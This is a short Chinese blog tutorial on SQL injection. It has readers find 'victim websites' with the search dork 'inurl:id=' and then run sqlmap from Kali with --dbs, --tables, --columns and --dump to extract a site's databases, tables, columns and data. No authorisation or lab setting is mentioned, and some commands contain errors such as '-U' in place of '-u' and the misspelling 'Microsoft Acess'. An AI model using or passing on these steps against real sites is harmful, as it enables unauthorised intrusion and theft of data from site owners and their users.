文章介绍了如何利用浏览器的inurl语法寻找可能存在SQL注入的网站,然后通过Kali虚拟机运行sqlmap工具,获取目标网站的数据库名、表名和字段名,最终提取出数据。强调了在使用sqlmap时需遵循正确的参数和数据库名称的大小写规则。
1.利用浏览器搜索语法
inurl:id= 
找到受害者网站以便进行sql注入
2.打开kali虚拟机运行sqlmap工具
sqlmap -U target website --dbs // 获取目标网站的所有数据库名运行过程中会判断目标网站的数据库类型,该工具支持主流的数据库管理系统
如果出现以上情况则说明目标网站不存在sql注入
我们来看一个扫描成功的案例
3.扫描到数据库系统后,我们来获取表。因为microsoft access比较特殊,我们可以直接去获取表
sqlmap -U target website --tables//获取数据库中的所有表名
可以知道只有一个news表
4.知道表名后我们来获取字段名
sqlmap -u target website -D Microsoft Acess -T news --columns //指定数据库名和表名来获取字段名
5.知道字段名后,我们来获取字段里的数据
sqlmap -U target website -D Microsoft Access -T news -C id,index,pl,title --dump //获取所有字段里的数据6.到此为止我们就成功的用sqlmap自动化工具获得了我们的数据
注意事项
- sqlmap的详细用法参照官方手册 https://github.com/sqlmapproject/sqlmap/wiki/Usage
- 在得到对应的数据库名表名时请遵照本来的字母,大小写不可以改
扫一扫
1773
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
